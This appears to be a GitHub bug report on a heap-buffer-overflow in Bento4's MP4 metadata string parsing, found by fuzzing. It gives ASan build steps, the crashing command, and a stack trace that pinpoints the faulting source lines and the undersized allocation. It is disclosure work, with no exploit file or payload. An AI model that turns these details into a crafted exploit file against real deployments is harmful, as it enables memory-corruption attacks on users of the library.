Bug: AddressSanitizer heap-buffer-overflow in AP4_MetaDataStringAtom during fread #1030
Description
Hi, we find a possible vulnerabiltiy in the latest version of Bento4.
Environment
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal/Bento4/build$ gcc --version
gcc (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0
Copyright (C) 2023 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal/Bento4/build$ cat /etc/os-release
PRETTY_NAME="Ubuntu 24.04.2 LTS"
NAME="Ubuntu"
VERSION_ID="24.04"
VERSION="24.04.2 LTS (Noble Numbat)"
VERSION_CODENAME=noble
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=noble
LOGO=ubuntu-logoReproduction]
Step
git clone [email protected]:axiomatic-systems/Bento4.git
cd ./Bento4
mkdir -p build && cd build
cmake .. \
-DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_C_FLAGS="-fsanitize=address -fno-omit-frame-pointer -g -O1" \
-DCMAKE_CXX_FLAGS="-fsanitize=address -fno-omit-frame-pointer -g -O1" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address"
make -j$(nproc)
./mp42aac meta_string_hbo.mp4 /dev/nullReproduction output
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal$ git clone [email protected]:axiomatic-systems/Bento4.git
Cloning into 'Bento4'...
remote: Enumerating objects: 14906, done.
remote: Counting objects: 100% (570/570), done.
remote: Compressing objects: 100% (196/196), done.
remote: Total 14906 (delta 464), reused 376 (delta 374), pack-reused 14336 (from 3)
Receiving objects: 100% (14906/14906), 48.05 MiB | 67.00 KiB/s, done.
Resolving deltas: 100% (10403/10403), done.
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal$ cd ./Bento4
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal/Bento4$ mkdir -p build && cd build
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal/Bento4/build$ cmake .. \
-DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_C_FLAGS="-fsanitize=address -fno-omit-frame-pointer -g -O1" \
-DCMAKE_CXX_FLAGS="-fsanitize=address -fno-omit-frame-pointer -g -O1" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address"
-- The C compiler identification is GNU 13.3.0
-- The CXX compiler identification is GNU 13.3.0
-- Detecting C compiler ABI info
-- Detecting C compiler ABI info - done
-- Check for working C compiler: /usr/bin/cc - skipped
-- Detecting C compile features
-- Detecting C compile features - done
-- Detecting CXX compiler ABI info
-- Detecting CXX compiler ABI info - done
-- Check for working CXX compiler: /usr/bin/c++ - skipped
-- Detecting CXX compile features
-- Detecting CXX compile features - done
-- Configuring done (1.0s)
-- Generating done (0.1s)
-- Build files have been written to: /home/zhicheng/FuzzDriverGen/findreal/Bento4/build
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal/Bento4/build$ make -j$(nproc)
[ 0%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Codecs/Ap4Ac3Parser.cpp.o
[ 1%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Codecs/Ap4Ac4Parser.cpp.o
[ 1%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Codecs/Ap4AdtsParser.cpp.o
[ 2%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Codecs/Ap4AvcParser.cpp.o
[ 2%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Codecs/Ap4BitStream.cpp.o
[ 2%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Codecs/Ap4HevcParser.cpp.o
[ 5%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Codecs/Ap4Eac3Parser.cpp.o
[ 5%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4.cpp.o
[ 5%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Codecs/Ap4NalParser.cpp.o
[ 5%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap48bdlAtom.cpp.o
[ 5%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Codecs/Ap4Mp4AudioInfo.cpp.o
[ 7%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Ac4Utils.cpp.o
[ 7%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4AinfAtom.cpp.o
[ 7%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4AtomSampleTable.cpp.o
[ 8%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Atom.cpp.o
[ 8%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4AtomFactory.cpp.o
[ 9%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Av1cAtom.cpp.o
[ 10%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4ByteStream.cpp.o
[ 10%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4BlocAtom.cpp.o
[ 11%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4AvccAtom.cpp.o
[ 11%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Co64Atom.cpp.o
[ 12%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4CommandFactory.cpp.o
[ 12%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Command.cpp.o
[ 12%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4CommonEncryption.cpp.o
[ 12%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4CttsAtom.cpp.o
[ 13%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4ContainerAtom.cpp.o
[ 15%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4DataBuffer.cpp.o
[ 15%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Dac3Atom.cpp.o
[ 15%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Dac4Atom.cpp.o
[ 16%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Debug.cpp.o
[ 16%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Dec3Atom.cpp.o
[ 17%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4DecoderConfigDescriptor.cpp.o
[ 17%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4DecoderSpecificInfoDescriptor.cpp.o
[ 17%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4DescriptorFactory.cpp.o
[ 18%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Descriptor.cpp.o
[ 19%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4DrefAtom.cpp.o
[ 19%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4DvccAtom.cpp.o
[ 20%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4ElstAtom.cpp.o
[ 20%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Expandable.cpp.o
[ 20%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4EsDescriptor.cpp.o
[ 21%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4EsdsAtom.cpp.o
[ 22%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4File.cpp.o
[ 23%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4FileCopier.cpp.o
[ 24%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4FragmentSampleTable.cpp.o
[ 24%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4FrmaAtom.cpp.o
[ 24%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4FileWriter.cpp.o
[ 25%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4FtypAtom.cpp.o
[ 25%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4GrpiAtom.cpp.o
[ 26%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4HintTrackReader.cpp.o
[ 26%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4HdlrAtom.cpp.o
[ 27%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4HmhdAtom.cpp.o
[ 28%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4IkmsAtom.cpp.o
[ 28%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4HvccAtom.cpp.o
[ 28%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4IodsAtom.cpp.o
[ 29%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Ipmp.cpp.o
[ 30%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4IproAtom.cpp.o
[ 31%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4IsfmAtom.cpp.o
[ 31%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4IsltAtom.cpp.o
[ 31%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4IsmaCryp.cpp.o
[ 32%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4LinearReader.cpp.o
[ 32%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Marlin.cpp.o
[ 33%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4MdhdAtom.cpp.o
[ 33%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4MehdAtom.cpp.o
[ 34%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4MfhdAtom.cpp.o
[ 34%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4MfroAtom.cpp.o
[ 35%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4MoovAtom.cpp.o
[ 35%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Movie.cpp.o
[ 36%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4MovieFragment.cpp.o
[ 36%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Mpeg2Ts.cpp.o
[ 37%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4MvhdAtom.cpp.o
[ 38%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4NmhdAtom.cpp.o
[ 38%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4ObjectDescriptor.cpp.o
[ 39%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4OdafAtom.cpp.o
[ 39%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4OddaAtom.cpp.o
[ 39%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4OhdrAtom.cpp.o
[ 40%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4OdheAtom.cpp.o
[ 41%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4OmaDcf.cpp.o
[ 41%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4PdinAtom.cpp.o
[ 41%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Processor.cpp.o
[ 42%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Piff.cpp.o
[ 43%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Protection.cpp.o
[ 43%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4PsshAtom.cpp.o
[ 44%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Results.cpp.o
[ 45%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4RtpAtom.cpp.o
[ 45%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4RtpHint.cpp.o
[ 46%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SLConfigDescriptor.cpp.o
[ 46%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SaioAtom.cpp.o
[ 47%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SaizAtom.cpp.o
[ 47%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Sample.cpp.o
[ 48%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SampleDescription.cpp.o
[ 48%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SampleEntry.cpp.o
[ 49%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SampleSource.cpp.o
[ 50%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SbgpAtom.cpp.o
[ 50%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SampleTable.cpp.o
[ 50%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SchmAtom.cpp.o
[ 51%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SdpAtom.cpp.o
[ 51%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SegmentBuilder.cpp.o
[ 52%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SencAtom.cpp.o
[ 53%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SgpdAtom.cpp.o
[ 53%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SidxAtom.cpp.o
[ 54%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SmhdAtom.cpp.o
[ 54%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4StcoAtom.cpp.o
[ 55%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SthdAtom.cpp.o
[ 56%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4StscAtom.cpp.o
[ 56%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4String.cpp.o
[ 56%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4StsdAtom.cpp.o
[ 56%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4StszAtom.cpp.o
[ 57%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4StssAtom.cpp.o
[ 58%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SttsAtom.cpp.o
[ 58%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Stz2Atom.cpp.o
[ 58%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4TencAtom.cpp.o
[ 59%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4SyntheticSampleTable.cpp.o
[ 60%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4TfdtAtom.cpp.o
[ 61%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4TfhdAtom.cpp.o
[ 61%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4TfraAtom.cpp.o
[ 62%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4TimsAtom.cpp.o
[ 62%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4TkhdAtom.cpp.o
[ 62%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4TrakAtom.cpp.o
[ 63%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Track.cpp.o
[ 64%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4TrefTypeAtom.cpp.o
[ 64%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4TrexAtom.cpp.o
[ 65%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4TrunAtom.cpp.o
[ 65%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4UrlAtom.cpp.o
[ 66%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4Utils.cpp.o
[ 66%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4UuidAtom.cpp.o
[ 67%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4VmhdAtom.cpp.o
[ 67%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Core/Ap4VpccAtom.cpp.o
[ 68%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Crypto/Ap4AesBlockCipher.cpp.o
[ 69%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Crypto/Ap4Hmac.cpp.o
[ 69%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Crypto/Ap4KeyWrap.cpp.o
[ 70%] Building CXX object CMakeFiles/ap4.dir/Source/C++/Crypto/Ap4StreamCipher.cpp.o
[ 70%] Building CXX object CMakeFiles/ap4.dir/Source/C++/MetaData/Ap4MetaData.cpp.o
[ 71%] Building CXX object CMakeFiles/ap4.dir/Source/C++/System/StdC/Ap4StdCFileByteStream.cpp.o
[ 71%] Building CXX object CMakeFiles/ap4.dir/Source/C++/System/Posix/Ap4PosixRandom.cpp.o
[ 72%] Linking CXX static library libap4.a
[ 72%] Built target ap4
[ 72%] Building CXX object CMakeFiles/fixaacsampledescription.dir/Source/C++/Apps/FixAacSampleDescription/FixAacSampleDescription.cpp.o
[ 73%] Building CXX object CMakeFiles/avcinfo.dir/Source/C++/Apps/AvcInfo/AvcInfo.cpp.o
[ 73%] Building CXX object CMakeFiles/mp42aac.dir/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp.o
[ 73%] Building CXX object CMakeFiles/aac2mp4.dir/Source/C++/Apps/Aac2Mp4/Aac2Mp4.cpp.o
[ 76%] Building CXX object CMakeFiles/mp42hevc.dir/Source/C++/Apps/Mp42Hevc/Mp42Hevc.cpp.o
[ 77%] Building CXX object CMakeFiles/mp42avc.dir/Source/C++/Apps/Mp42Avc/Mp42Avc.cpp.o
[ 76%] Building CXX object CMakeFiles/mp4diff.dir/Source/C++/Apps/Mp4Diff/Mp4Diff.cpp.o
[ 77%] Building CXX object CMakeFiles/mp4dcfpackager.dir/Source/C++/Apps/Mp4DcfPackager/Mp4DcfPackager.cpp.o
[ 77%] Building CXX object CMakeFiles/hevcinfo.dir/Source/C++/Apps/HevcInfo/HevcInfo.cpp.o
[ 77%] Building CXX object CMakeFiles/mp4audioclip.dir/Source/C++/Apps/Mp4AudioClip/Mp4AudioClip.cpp.o
[ 78%] Building CXX object CMakeFiles/mp42ts.dir/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp.o
[ 79%] Building CXX object CMakeFiles/mp42hls.dir/Source/C++/Apps/Mp42Hls/Mp42Hls.cpp.o
[ 79%] Building CXX object CMakeFiles/mp4fragment.dir/Source/C++/Apps/Mp4Fragment/Mp4Fragment.cpp.o
[ 79%] Building CXX object CMakeFiles/mp4extract.dir/Source/C++/Apps/Mp4Extract/Mp4Extract.cpp.o
[ 80%] Building CXX object CMakeFiles/mp4compact.dir/Source/C++/Apps/Mp4Compact/Mp4Compact.cpp.o
[ 80%] Building CXX object CMakeFiles/mp4edit.dir/Source/C++/Apps/Mp4Edit/Mp4Edit.cpp.o
[ 80%] Building CXX object CMakeFiles/mp4encrypt.dir/Source/C++/Apps/Mp4Encrypt/Mp4Encrypt.cpp.o
[ 80%] Building CXX object CMakeFiles/mp4decrypt.dir/Source/C++/Apps/Mp4Decrypt/Mp4Decrypt.cpp.o
[ 81%] Building CXX object CMakeFiles/mp4iframeindex.dir/Source/C++/Apps/Mp4IframeIndex/Mp4IframeIndex.cpp.o
[ 82%] Building CXX object CMakeFiles/mp4info.dir/Source/C++/Apps/Mp4Info/Mp4Info.cpp.o
[ 82%] Building CXX object CMakeFiles/mp4dump.dir/Source/C++/Apps/Mp4Dump/Mp4Dump.cpp.o
[ 84%] Building CXX object CMakeFiles/mp4tag.dir/Source/C++/Apps/Mp4Tag/Mp4Tag.cpp.o
[ 84%] Building CXX object CMakeFiles/mp4split.dir/Source/C++/Apps/Mp4Split/Mp4Split.cpp.o
[ 85%] Building CXX object CMakeFiles/mp4pssh.dir/Source/C++/Apps/Mp4Pssh/Mp4Pssh.cpp.o
[ 86%] Building CXX object CMakeFiles/mp4mux.dir/Source/C++/Apps/Mp4Mux/Mp4Mux.cpp.o
[ 87%] Building CXX object CMakeFiles/mp4rtphintinfo.dir/Source/C++/Apps/Mp4RtpHintInfo/Mp4RtpHintInfo.cpp.o
[ 88%] Linking CXX executable hevcinfo
[ 89%] Linking CXX executable mp4extract
[ 89%] Linking CXX executable mp4rtphintinfo
[ 89%] Linking CXX executable mp4audioclip
[ 90%] Linking CXX executable aac2mp4
[ 90%] Linking CXX executable mp42aac
[ 91%] Linking CXX executable fixaacsampledescription
[ 92%] Linking CXX executable avcinfo
[ 93%] Linking CXX executable mp4diff
[ 93%] Linking CXX executable mp4compact
[ 94%] Linking CXX executable mp4decrypt
[ 94%] Linking CXX executable mp4iframeindex
[ 95%] Linking CXX executable mp4dcfpackager
[ 95%] Linking CXX executable mp42avc
[ 96%] Linking CXX executable mp4dump
[ 96%] Linking CXX executable mp42hevc
[ 96%] Linking CXX executable mp4pssh
[ 97%] Linking CXX executable mp4edit
[ 97%] Linking CXX executable mp4split
[ 97%] Built target hevcinfo
[ 97%] Linking CXX executable mp42ts
[ 97%] Built target avcinfo
[ 98%] Built target mp4audioclip
[ 98%] Linking CXX executable mp4encrypt
[ 98%] Built target mp4rtphintinfo
[ 98%] Built target mp4extract
[ 98%] Built target aac2mp4
[ 98%] Built target fixaacsampledescription
[ 98%] Built target mp42aac
[ 98%] Built target mp4iframeindex
[ 98%] Built target mp4compact
[ 98%] Built target mp4decrypt
[ 98%] Built target mp4diff
[ 98%] Built target mp4dcfpackager
[ 98%] Built target mp42avc
[ 98%] Built target mp4dump
[ 98%] Built target mp42hevc
[ 98%] Built target mp4edit
[ 98%] Built target mp4pssh
[ 98%] Built target mp4split
[ 99%] Linking CXX executable mp4tag
[ 99%] Built target mp42ts
[ 99%] Built target mp4encrypt
[ 99%] Built target mp4tag
[ 99%] Linking CXX executable mp42hls
[100%] Linking CXX executable mp4fragment
[100%] Built target mp42hls
[100%] Linking CXX executable mp4info
[100%] Built target mp4fragment
[100%] Linking CXX executable mp4mux
[100%] Built target mp4info
[100%] Built target mp4mux
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal/Bento4/build$ ./mp42aac meta_string_hbo.mp4 /dev/null
=================================================================
==8720==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x5020000000b1 at pc 0x7da2cea7ed7f bp 0x7ffd469d3870 sp 0x7ffd469d3018
WRITE of size 243 at 0x5020000000b1 thread T0
#0 0x7da2cea7ed7e in fread ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:996
#1 0x626ae04cfff7 in fread /usr/include/x86_64-linux-gnu/bits/stdio2.h:212
#2 0x626ae04cfff7 in AP4_StdcFileByteStream::ReadPartial(void*, unsigned int, unsigned int&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/System/StdC/Ap4StdCFileByteStream.cpp:341
#3 0x626ae048d174 in AP4_ByteStream::Read(void*, unsigned int) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4ByteStream.cpp:54
#4 0x626ae04c9242 in AP4_MetaDataStringAtom::AP4_MetaDataStringAtom(unsigned int, unsigned int, AP4_ByteStream&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/MetaData/Ap4MetaData.cpp:1637
#5 0x626ae04ca1f2 in AP4_MetaDataAtomTypeHandler::CreateAtom(unsigned int, unsigned int, AP4_ByteStream&, unsigned int, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/MetaData/Ap4MetaData.cpp:428
#6 0x626ae04ddbf0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:844
#7 0x626ae04db9bf in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234
#8 0x626ae0501967 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:196
#9 0x626ae0501c66 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:140
#10 0x626ae05022c0 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88
#11 0x626ae04ca119 in AP4_MetaDataAtomTypeHandler::CreateAtom(unsigned int, unsigned int, AP4_ByteStream&, unsigned int, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/MetaData/Ap4MetaData.cpp:419
#12 0x626ae04ddbf0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:844
#13 0x626ae04db9bf in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234
#14 0x626ae0501967 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:196
#15 0x626ae0501c66 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:140
#16 0x626ae05022c0 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88
#17 0x626ae04dda93 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816
#18 0x626ae04db9bf in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234
#19 0x626ae04dc261 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154
#20 0x626ae04913cd in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4File.cpp:104
#21 0x626ae0491946 in AP4_File::AP4_File(AP4_ByteStream&, bool) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4File.cpp:78
#22 0x626ae048af8b in main /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:250
#23 0x7da2ce22a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
#24 0x7da2ce22a28a in __libc_start_main_impl ../csu/libc-start.c:360
#25 0x626ae048a844 in _start (/home/zhicheng/FuzzDriverGen/findreal/Bento4/build/mp42aac+0x2e844) (BuildId: 94ff24dd55ddc5b1351bd12a32fabe9570488544)
0x5020000000b1 is located 0 bytes after 1-byte region [0x5020000000b0,0x5020000000b1)
allocated by thread T0 here:
#0 0x7da2ceafe6c8 in operator new[](unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cpp:98
#1 0x626ae04b3a7a in AP4_String::AP4_String(unsigned int) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/Core/Ap4String.cpp:85
#2 0x626ae04c91e8 in AP4_MetaDataStringAtom::AP4_MetaDataStringAtom(unsigned int, unsigned int, AP4_ByteStream&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/MetaData/Ap4MetaData.cpp:1634
#3 0x626ae04ca1f2 in AP4_MetaDataAtomTypeHandler::CreateAtom(unsigned int, unsigned int, AP4_ByteStream&, unsigned int, AP4_Atom*&) /home/zhicheng/FuzzDriverGen/findreal/Bento4/Source/C++/MetaData/Ap4MetaData.cpp:428
